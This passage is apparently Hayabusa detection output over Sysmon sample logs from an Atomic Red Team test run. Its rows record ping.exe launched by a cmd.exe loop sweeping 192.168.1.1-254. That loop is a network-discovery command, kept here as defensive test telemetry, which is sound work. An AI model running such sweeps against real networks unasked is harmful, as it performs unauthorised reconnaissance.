| Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5676 | PGUID: 747F3D96-D93C-5D31-0000-0010B1083600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:45.532 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.142 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5800 | PGUID: 747F3D96-D93D-5D31-0000-0010A20B3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:45.970 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.143 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7156 | PGUID: 747F3D96-D93D-5D31-0000-0010910E3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:46.405 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.144 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4172 | PGUID: 747F3D96-D93E-5D31-0000-00107E113600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:46.879 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.145 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1628 | PGUID: 747F3D96-D93E-5D31-0000-0010FC153600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:47.411 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.146 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 680 | PGUID: 747F3D96-D93F-5D31-0000-001041203600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:47.993 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.147 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6600 | PGUID: 747F3D96-D93F-5D31-0000-001061233600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:48.567 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.148 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 948 | PGUID: 747F3D96-D940-5D31-0000-00104E263600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:49.026 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.149 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2136 | PGUID: 747F3D96-D941-5D31-0000-00103C293600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:49.408 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.150 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 868 | PGUID: 747F3D96-D941-5D31-0000-0010282C3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:50.047 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.151 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5380 | PGUID: 747F3D96-D942-5D31-0000-0010142F3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:50.521 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.152 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3712 | PGUID: 747F3D96-D942-5D31-0000-001013323600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:51.038 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.153 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 640 | PGUID: 747F3D96-D943-5D31-0000-0010FF343600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:51.517 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.154 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1680 | PGUID: 747F3D96-D943-5D31-0000-0010EB373600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:52.009 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.155 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4532 | PGUID: 747F3D96-D944-5D31-0000-0010D73A3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:52.553 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.156 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5024 | PGUID: 747F3D96-D944-5D31-0000-00109E433600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:53.037 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.157 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2180 | PGUID: 747F3D96-D945-5D31-0000-0010A2463600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:53.555 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.158 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2168 | PGUID: 747F3D96-D945-5D31-0000-0010A2493600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:54.026 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.159 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1664 | PGUID: 747F3D96-D946-5D31-0000-0010904C3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:54.529 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.160 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4016 | PGUID: 747F3D96-D946-5D31-0000-00107C4F3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:54.999 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.161 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2780 | PGUID: 747F3D96-D946-5D31-0000-001068523600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:55.533 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.162 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4036 | PGUID: 747F3D96-D947-5D31-0000-001068553600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:56.017 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.163 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6332 | PGUID: 747F3D96-D948-5D31-0000-001054583600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:56.507 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.164 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4368 | PGUID: 747F3D96-D948-5D31-0000-0010405B3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:57.003 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.165 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5480 | PGUID: 747F3D96-D948-5D31-0000-00102C5E3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:57.544 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.166 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5316 | PGUID: 747F3D96-D949-5D31-0000-0010F3663600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:58.011 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.167 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1232 | PGUID: 747F3D96-D94A-5D31-0000-0010E8693600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:58.563 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.168 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6544 | PGUID: 747F3D96-D94A-5D31-0000-0010D76C3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:59.016 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.169 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6300 | PGUID: 747F3D96-D94B-5D31-0000-0010CD6F3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:59.522 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.170 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1988 | PGUID: 747F3D96-D94B-5D31-0000-0010B9723600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:00.077 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.171 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4032 | PGUID: 747F3D96-D94C-5D31-0000-0010BA763600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:00.621 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.172 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1604 | PGUID: 747F3D96-D94C-5D31-0000-0010B9793600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:01.018 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.173 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1596 | PGUID: 747F3D96-D94D-5D31-0000-0010EB853600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:01.515 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.174 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5952 | PGUID: 747F3D96-D94D-5D31-0000-0010D9883600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:02.019 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.175 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2752 | PGUID: 747F3D96-D94E-5D31-0000-0010C58B3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:02.556 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.176 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1844 | PGUID: 747F3D96-D94E-5D31-0000-00108C943600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:03.031 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.177 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3856 | PGUID: 747F3D96-D94F-5D31-0000-001079973600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:03.557 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.178 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3796 | PGUID: 747F3D96-D94F-5D31-0000-0010659A3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:04.044 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.179 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1244 | PGUID: 747F3D96-D950-5D31-0000-0010659D3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:04.539 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.180 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3328 | PGUID: 747F3D96-D950-5D31-0000-001051A03600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:05.023 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.181 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 592 | PGUID: 747F3D96-D951-5D31-0000-00103EA33600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:05.517 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.182 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6288 | PGUID: 747F3D96-D951-5D31-0000-00102BA63600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:06.023 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.183 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3736 | PGUID: 747F3D96-D952-5D31-0000-001017A93600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:06.535 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.184 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1720 | PGUID: 747F3D96-D952-5D31-0000-001003AC3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:07.047 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.185 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 752 | PGUID: 747F3D96-D953-5D31-0000-0010EFAE3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:07.533 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.186 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3680 | PGUID: 747F3D96-D953-5D31-0000-0010B7B73600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:07.912 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.187 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1880 | PGUID: 747F3D96-D953-5D31-0000-0010A3BA3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 